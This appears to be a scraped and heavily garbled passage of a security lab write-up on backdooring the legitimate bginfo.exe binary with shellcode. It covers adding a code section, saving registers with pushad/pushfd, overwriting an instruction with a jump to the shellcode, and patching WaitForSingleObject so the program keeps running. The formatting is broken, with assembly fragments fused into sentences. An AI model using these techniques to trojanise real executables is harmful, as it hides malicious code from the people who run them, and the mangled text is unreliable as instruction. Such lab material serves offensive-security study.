.code1
that will contain our shellcode - note the size is 200h bytes, so plenty for our shellcode which was only 324 bytes:contains code
using CFF Explorer:pushad
and pushdf
are the first instructions at 4d8000 - it's not shown in this lab how those two instructions were inserted there, but there is no magic - just add bytes 60 9c
before the shellcode at 0xCD200 in the bginfo and you're set.pushad
and pushfd
instructions - we do this so we can restore their state before redirecting the execution back to bginfo.exe and avoid any crashesWaitForSingleObject
does not wait indefinitely and does not freeze bginfo.exe once the shellcode is executedcall ebp
to prevent the shellcode from shutting down of bginfo.exepushad
and pushfd
as explained in step 3, with add esp, <ESP_POST_SHELLCODE - ESP_PRE_SHELLCODE>
. This is where ESPs from point 4 and 7 comes in to playpopfd
and popad
jmp address
instruction.mov edi, bb40e64e
at 00467b29:mov edi, 0xbb40e64e
at 00467b29, hence we need to remember it for later as explained in 1.2.jmp 0x004d8000
which will make the bginfo jump to our shellcode located at 0x004d8000 when executed:bf 4e e6 40 bb
(bytes found at 00467b29 when bginfo is in memory) in the bginfo.exe (screenshot below) and replaced them with bytes e9 d2 04 07 00
which translates to jmp bgfinfo.d48000
(jump to our shellcode, above screenshot).WaitForSingleObject
function (see definition below). It's called with an argument INFINITE
(-1 or 0xFFFFFFFF‬), meaning the thread will be blocked forever.WaitForSingleObject
which is going to be jumped to with jmp eax
at 004d8081. Note the stack - it contains the thread handle (28c) to block and the wait time FFFFFFFF == INFINITE which is the second argument for WaitForSingleObject
:dec esi
at 004d811b changes ESI value to -1 (currently ESI = 0), which is the value pushed to the stack as an argument dwMilliSeconds
for WaitForSignaledObject
:WaitForSingleObject
will wait 0 seconds before unblocking the UI:call ebp
instruction at 004d8144 if we don't want the shellcode to close the bginfo.exe process:pushad
and pushfd
instructions as mentioned in point 7.ESP
after pushad
and pushfd
was 0019ff30
:ESP
after executing the shellcode was 0019fd2c
:popfd
and popad